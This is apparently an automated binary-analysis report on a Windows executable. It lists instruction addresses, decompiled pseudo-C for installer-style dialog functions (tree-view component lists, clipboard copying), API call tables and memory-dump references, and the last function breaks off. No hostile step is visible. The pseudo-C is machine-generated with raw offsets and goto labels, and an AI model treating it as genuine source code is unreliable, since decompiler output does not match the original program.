                                                                              0x0040509c
                                                                              0x004050a3
                                                                              0x004050fa
                                                                              0x004050fe
                                                                              0x00000000
                                                                              0x00405105
                                                                              0x0040510d
                                                                              0x00405115
                                                                              0x00405118
                                                                              0x00405215
                                                                              0x00000000
                                                                              0x00405215
                                                                              0x0040511e
                                                                              0x00405124
                                                                              0x00405126
                                                                              0x00405127
                                                                              0x00405133
                                                                              0x00405139
                                                                              0x0040513f
                                                                              0x00405154
                                                                              0x0040515a
                                                                              0x00405141
                                                                              0x00405146
                                                                              0x0040514c
                                                                              0x0040514f
                                                                              0x0040514f
                                                                              0x00405168
                                                                              0x00405170
                                                                              0x00405173
                                                                              0x0040517c
                                                                              0x0040517f
                                                                              0x00405186
                                                                              0x0040518d
                                                                              0x00405195
                                                                              0x00405195
                                                                              0x004051ac
                                                                              0x004051ac
                                                                              0x004051b3
                                                                              0x004051b9
                                                                              0x004051c2
                                                                              0x004051c9
                                                                              0x004051d2
                                                                              0x004051d4
                                                                              0x004051d7
                                                                              0x004051e0
                                                                              0x004051ec
                                                                              0x004051ee
                                                                              0x004051f4
                                                                              0x004051f5
                                                                              0x004051f6
                                                                              0x004051fe
                                                                              0x00405209
                                                                              0x0040520f
                                                                              0x0040520f
                                                                              0x00000000
                                                                              0x00405173
                                                                              0x004050fe
                                                                              0x004050ab
                                                                              0x004050db
                                                                              0x004050e3
                                                                              0x004050ee
                                                                              0x004050ee
                                                                              0x004050f5
                                                                              0x00000000
                                                                              0x004050f5
                                                                              0x004050af
                                                                              0x004050b9
                                                                              0x00000000
                                                                              0x00405081
                                                                              0x00405087
                                                                              0x004050be
                                                                              0x00000000
                                                                              0x004050c7
                                                                              0x00405090
                                                                              0x00405095
                                                                              0x00405097
                                                                              0x00000000
                                                                              0x00405097
                                                                              0x0040507f
                                                                              0x00404ec1
                                                                              0x00404ec5
                                                                              0x00404ece
                                                                              0x00404ed5
                                                                              0x00404ed8
                                                                              0x00404edb
                                                                              0x00404ede
                                                                              0x00404edf
                                                                              0x00404ee0
                                                                              0x00404ef9
                                                                              0x00404efc
                                                                              0x00404f06
                                                                              0x00404f15
                                                                              0x00404f1d
                                                                              0x00404f25
                                                                              0x00404f2a
                                                                              0x00404f2d
                                                                              0x00404f39
                                                                              0x00404f42
                                                                              0x00404f4b
                                                                              0x00404f6e
                                                                              0x00404f74
                                                                              0x00404f85
                                                                              0x00404f8a
                                                                              0x00404f98
                                                                              0x00404fa6
                                                                              0x00404fa6
                                                                              0x00404fab
                                                                              0x00404fb9
                                                                              0x00404fb9
                                                                              0x00404fbe
                                                                              0x00404fc1
                                                                              0x00404fc6
                                                                              0x00404fd2
                                                                              0x00404fdb
                                                                              0x00404fe8
                                                                              0x00404ff7
                                                                              0x00404fea
                                                                              0x00404fef
                                                                              0x00404fef
                                                                              0x00404fe8
                                                                              0x0040500c
                                                                              0x00405015
                                                                              0x0040501e
                                                                              0x0040502e
                                                                              0x0040503a
                                                                              0x0040503a
                                                                              0x00000000

                                                                              APIs
                                                                              • GetDlgItem.USER32 ref: 00404EFF
                                                                              • GetDlgItem.USER32 ref: 00404F0E
                                                                              • GetDlgItem.USER32 ref: 00404F1D
                                                                                • Part of subcall function 00403DDC: SendMessageA.USER32(00000028,?,00000001,00403C0F), ref: 00403DEA
                                                                              • GetClientRect.USER32 ref: 00404F4B
                                                                              • GetSystemMetrics.USER32 ref: 00404F53
                                                                              • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404F74
                                                                              • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404F85
                                                                              • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404F98
                                                                              • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404FA6
                                                                              • SendMessageA.USER32(?,00001024,00000000,?), ref: 00404FB9
                                                                              • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404FDB
                                                                              • ShowWindow.USER32(?,00000008), ref: 00404FEF
                                                                              • GetDlgItem.USER32 ref: 00405005
                                                                              • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405015
                                                                              • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040502E
                                                                              • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 0040503A
                                                                              • GetDlgItem.USER32 ref: 00405057
                                                                              • CreateThread.KERNEL32 ref: 00405065
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040506C
                                                                              • ShowWindow.USER32(00000000), ref: 00405090
                                                                              • ShowWindow.USER32(?,00000008), ref: 00405095
                                                                              • ShowWindow.USER32(00000008), ref: 004050DB
                                                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040510D
                                                                              • CreatePopupMenu.USER32 ref: 0040511E
                                                                              • AppendMenuA.USER32 ref: 00405133
                                                                              • GetWindowRect.USER32 ref: 00405146
                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405168
                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051A3
                                                                              • OpenClipboard.USER32(00000000), ref: 004051B3
                                                                              • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 004051B9
                                                                              • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004051C2
                                                                              • GlobalLock.KERNEL32 ref: 004051CC
                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051E0
                                                                              • lstrlenA.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004051E7
                                                                              • GlobalUnlock.KERNEL32(00000000,00000000,?,?,00000000,?,00000000), ref: 004051FE
                                                                              • SetClipboardData.USER32 ref: 00405209
                                                                              • CloseClipboard.USER32 ref: 0040520F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlocklstrlen
                                                                              • String ID: {
                                                                              • API String ID: 1050754034-366298937
                                                                              • Opcode ID: 4723e716c10b73e0435ed70f776bd01053d2ffbf0d5e924f1bf3189799b0a89d
                                                                              • Instruction ID: 09b722d0185256cc624264d40bb0edb6627bdfa233c056c1d5ba82df3b217a72
                                                                              • Opcode Fuzzy Hash: 4723e716c10b73e0435ed70f776bd01053d2ffbf0d5e924f1bf3189799b0a89d
                                                                              • Instruction Fuzzy Hash: 0FA14B70900208FFDB11AF64DD89AAE7F79FB48354F10812AFA05BA1A1C7785E41DF69
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004046A7, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 477windowmemoryCOMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 93%
                                                                              			E004046A7(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				struct HBITMAP__* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				void* _t252;
				intOrPtr _t258;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x7a2fa8;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x7a2f88 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x7a2f91 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404627(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x7a2f90) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x79f564;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x79f578;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x79f564 = _t315;
								 *0x79f578 = _t315;
								 *0x7a2fe0 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x7a2f91 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E00401410(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x79f578;
									_t196 =  *0x7a2fa8;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x7a2fac <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x7a275c + 0x10)) != _t315) {
											E00404545(0x3ff, 0xfffffffb, E004045FA(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x7a2fac);
									goto L84;
								} else {
									_t282 = E004012E2( *0x79f578);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x7a2fe0 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x79f578 = GlobalAlloc(0x40,  *0x7a2fac << 2);
					_v24 = LoadBitmapA( *0x7a2f80, 0x6e);
					 *0x79f574 = SetWindowLongA(_v8, 0xfffffffc, E00404CA1);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x79f564 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x79f564);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if(_t258 != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							_push(_t258);
							_push(_t315);
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E004059E1(_t286, _t315, _t320)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403DA7(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403DA7(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x7a2fac <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x79f578 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x79f578 + _t318 * 4) = _t274;
									_t288 =  *( *0x79f578 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x7a2fac);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403DDC(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403DDC(_v12);
								L89:
								return E00403E0E(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                                              0x004046c5
                                                                              0x004046cb
                                                                              0x004046cd
                                                                              0x004046d3
                                                                              0x004046d9
                                                                              0x004046e6
                                                                              0x004046ef
                                                                              0x004046f2
                                                                              0x004046f5
                                                                              0x00404916
                                                                              0x0040491d
                                                                              0x00404931
                                                                              0x0040491f
                                                                              0x00404921
                                                                              0x00404924
                                                                              0x00404925
                                                                              0x0040492c
                                                                              0x0040492c
                                                                              0x0040493d
                                                                              0x0040494b
                                                                              0x0040494e
                                                                              0x00404964
                                                                              0x004049dc
                                                                              0x004049df
                                                                              0x004049e1
                                                                              0x004049eb
                                                                              0x004049f9
                                                                              0x004049f9
                                                                              0x004049fb
                                                                              0x00404a05
                                                                              0x00404a0b
                                                                              0x00404a2c
                                                                              0x00404a0d
                                                                              0x00404a1a
                                                                              0x00404a1a
                                                                              0x00404a0b
                                                                              0x00404a05
                                                                              0x00000000
                                                                              0x004049df
                                                                              0x00404969
                                                                              0x00404974
                                                                              0x00404979
                                                                              0x00404980
                                                                              0x00404987
                                                                              0x00404991
                                                                              0x00404991
                                                                              0x00404995
                                                                              0x0040499a
                                                                              0x0040499f
                                                                              0x004049b5
                                                                              0x004049a1
                                                                              0x004049a1
                                                                              0x004049a9
                                                                              0x004049b0
                                                                              0x004049ab
                                                                              0x004049ab
                                                                              0x004049ab
                                                                              0x004049a9
                                                                              0x004049b9
                                                                              0x004049bb
                                                                              0x004049c9
                                                                              0x004049ca
                                                                              0x004049d6
                                                                              0x004049d9
                                                                              0x004049d9
                                                                              0x0040499a
                                                                              0x00000000
                                                                              0x00404987
                                                                              0x0040496b
                                                                              0x00404972
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00404a2f
                                                                              0x00404a2f
                                                                              0x00404a36
                                                                              0x00404aaa
                                                                              0x00404ab1
                                                                              0x00404abd
                                                                              0x00404abd
                                                                              0x00404ac6
                                                                              0x00404ac8
                                                                              0x00404acf
                                                                              0x00404ad2
                                                                              0x00404ad2
                                                                              0x00404ad8
                                                                              0x00404adf
                                                                              0x00404ae2
                                                                              0x00404ae2
                                                                              0x00404ae8
                                                                              0x00404aee
                                                                              0x00404af4
                                                                              0x00404af4
                                                                              0x00404b01
                                                                              0x00404c4e
                                                                              0x00404c55
                                                                              0x00404c72
                                                                              0x00404c78
                                                                              0x00404c8a
                                                                              0x00404c8a
                                                                              0x00000000
                                                                              0x00404b07
                                                                              0x00404b09
                                                                              0x00404b11
                                                                              0x00404b15
                                                                              0x00404b15
                                                                              0x00404b1d
                                                                              0x00404b5e
                                                                              0x00404b60
                                                                              0x00404b70
                                                                              0x00404b73
                                                                              0x00404b78
                                                                              0x00404b7f
                                                                              0x00404b82
                                                                              0x00404c24
                                                                              0x00404c2a
                                                                              0x00404c38
                                                                              0x00404c49
                                                                              0x00404c49
                                                                              0x00000000
                                                                              0x00404c38
                                                                              0x00404b88
                                                                              0x00404b8b
                                                                              0x00404b91
                                                                              0x00404b96
                                                                              0x00404b98
                                                                              0x00404b9a
                                                                              0x00404ba0
                                                                              0x00404ba7
                                                                              0x00404bac
                                                                              0x00404bb3
                                                                              0x00404bb6
                                                                              0x00404bb6
                                                                              0x00404bbd
                                                                              0x00404bc9
                                                                              0x00404bcd
                                                                              0x00404bcf
                                                                              0x00404bcf
                                                                              0x00404bbf
                                                                              0x00404bc1
                                                                              0x00404bc1
                                                                              0x00404bef
                                                                              0x00404bfb
                                                                              0x00404c0a
                                                                              0x00404c0a
                                                                              0x00404c0c
                                                                              0x00404c0f
                                                                              0x00404c18
                                                                              0x00000000
                                                                              0x00404b1f
                                                                              0x00404b2a
                                                                              0x00404b2d
                                                                              0x00404b32
                                                                              0x00404b34
                                                                              0x00404b38
                                                                              0x00404b48
                                                                              0x00404b52
                                                                              0x00404b54
                                                                              0x00404b57
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00404b3a
                                                                              0x00404b3a
                                                                              0x00404b40
                                                                              0x00404b42
                                                                              0x00404b42
                                                                              0x00404b43
                                                                              0x00404b44
                                                                              0x00000000
                                                                              0x00404b3a
                                                                              0x00404b1d
                                                                              0x00404b01
                                                                              0x00404a3e
                                                                              0x00000000
                                                                              0x00404a54
                                                                              0x00404a5e
                                                                              0x00404a63
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00404a75
                                                                              0x00404a7a
                                                                              0x00404a86
                                                                              0x00404a86
                                                                              0x00404a88
                                                                              0x00404a97
                                                                              0x00404a99
                                                                              0x00404aa0
                                                                              0x00404aa3
                                                                              0x00000000
                                                                              0x00404aa3
                                                                              0x00404a3e
                                                                              0x004046fb
                                                                              0x00404700
                                                                              0x0040470a
                                                                              0x0040470b
                                                                              0x00404714
                                                                              0x0040471f
                                                                              0x0040473a
                                                                              0x0040474c
                                                                              0x00404751
                                                                              0x0040475c
                                                                              0x00404765
                                                                              0x0040477a
                                                                              0x0040478b
                                                                              0x00404798
                                                                              0x00404798
                                                                              0x0040479d
                                                                              0x004047a3
                                                                              0x004047a5
                                                                              0x004047a8
                                                                              0x004047ad
                                                                              0x004047b2
                                                                              0x004047b4
                                                                              0x004047b4
                                                                              0x004047b7
                                                                              0x004047b8
                                                                              0x004047d4
                                                                              0x004047d4
                                                                              0x004047d6
                                                                              0x004047d7
                                                                              0x004047dc
                                                                              0x004047df
                                                                              0x004047e2
                                                                              0x004047e6
                                                                              0x004047eb
                                                                              0x004047f0
                                                                              0x004047f4
                                                                              0x004047f9
                                                                              0x004047fe
                                                                              0x00404800
                                                                              0x00404808
                                                                              0x004048d2
                                                                              0x004048e5
                                                                              0x00000000
                                                                              0x0040480e
                                                                              0x00404811
                                                                              0x00404814
                                                                              0x00404817
                                                                              0x00404817
                                                                              0x0040481d
                                                                              0x00404823
                                                                              0x00404826
                                                                              0x0040482c
                                                                              0x0040482d
                                                                              0x00404832
                                                                              0x0040483b
                                                                              0x00404842
                                                                              0x00404845
                                                                              0x00404848
                                                                              0x0040484b
                                                                              0x00404887
                                                                              0x004048b0
                                                                              0x00404889
                                                                              0x00404896
                                                                              0x00404896
                                                                              0x0040484d
                                                                              0x00404850
                                                                              0x0040485f
                                                                              0x00404869
                                                                              0x00404871
                                                                              0x00404878
                                                                              0x00404880
                                                                              0x00404880
                                                                              0x0040484b
                                                                              0x004048b6
                                                                              0x004048b7
                                                                              0x004048c3
                                                                              0x004048c3
                                                                              0x004048d0
                                                                              0x004048eb
                                                                              0x004048ef
                                                                              0x0040490c
                                                                              0x00404911
                                                                              0x00404914
                                                                              0x00000000
                                                                              0x004048f1
                                                                              0x004048f6
                                                                              0x004048ff
                                                                              0x00404c8c
                                                                              0x00404c9e
                                                                              0x00404c9e
                                                                              0x004048ef
                                                                              0x00000000
                                                                              0x004048d0
                                                                              0x00404808

                                                                              APIs
                                                                              • GetDlgItem.USER32 ref: 004046BE
                                                                              • GetDlgItem.USER32 ref: 004046CB
                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404717
                                                                              • LoadBitmapA.USER32 ref: 0040472A
                                                                              • SetWindowLongA.USER32 ref: 0040473D
                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404751
                                                                              • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404765
                                                                              • SendMessageA.USER32(?,00001109,00000002), ref: 0040477A
                                                                              • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404786
                                                                              • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404798
                                                                              • DeleteObject.GDI32(?), ref: 0040479D
                                                                              • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004047C8
                                                                              • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004047D4
                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404869
                                                                              • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404894
                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 004048A8
                                                                              • GetWindowLongA.USER32 ref: 004048D7
                                                                              • SetWindowLongA.USER32 ref: 004048E5
                                                                              • ShowWindow.USER32(?,00000005), ref: 004048F6
                                                                              • SendMessageA.USER32(?,00000419,00000000,?), ref: 004049F9
                                                                              • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404A5E
                                                                              • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404A73
                                                                              • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404A97
                                                                              • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404ABD
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404AD2
                                                                              • GlobalFree.KERNEL32 ref: 00404AE2
                                                                              • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404B52
                                                                              • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404BFB
                                                                              • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404C0A
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00404C2A
                                                                              • ShowWindow.USER32(?,00000000), ref: 00404C78
                                                                              • GetDlgItem.USER32 ref: 00404C83
                                                                              • ShowWindow.USER32(00000000), ref: 00404C8A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                              • String ID: $M$N
                                                                              • API String ID: 1638840714-813528018
                                                                              • Opcode ID: f88003ccba9f0ad4292bbb639cf8dfb56ca7ece40271dea942f8be45a3b21ba3
                                                                              • Instruction ID: 9804f70a80ad740571f010f4d41a056d70bc73ca34169b501aedef0055c070ba
                                                                              • Opcode Fuzzy Hash: f88003ccba9f0ad4292bbb639cf8dfb56ca7ece40271dea942f8be45a3b21ba3
                                                                              • Instruction Fuzzy Hash: 3C029EB0D00208EFEB10DF64CD45AAE7BB5EB84315F10817AF610BA2E1C7799A52CF58
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004041E5, Relevance: 26.5, APIs: 9, Strings: 6, Instructions: 242stringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 68%
                                                                              			E004041E5(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr* _t81;
				int _t86;
				int _t88;
				int _t100;
				signed int _t105;
				char* _t110;
				intOrPtr _t114;
				intOrPtr* _t128;
				signed int _t140;
				signed int _t145;
				CHAR* _t151;

				_t75 =  *0x79ed58;
				_v36 = _t75;
				_t151 = ( *(_t75 + 0x3c) << 0xa) + 0x7a4000;
				_v12 =  *((intOrPtr*)(_t75 + 0x38));
				if(_a8 == 0x40b) {
					E004052A3(0x3fb, _t151);
					E00405BFB(_t151);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L19:
